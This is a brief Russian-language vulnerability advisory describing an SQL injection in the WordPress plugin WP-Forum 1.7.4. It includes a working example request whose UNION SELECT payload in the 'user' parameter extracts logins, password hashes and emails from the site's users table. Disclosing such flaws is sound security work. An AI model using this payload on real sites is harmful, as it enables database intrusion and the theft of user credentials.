Программа: WordPress plugin WP-Forum 1.7.4
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+ union+select+null,concat(user_login,0x2f,user_pass,0x2f, user_email),null,null,null,null,null+from+wp_tbv_users/*
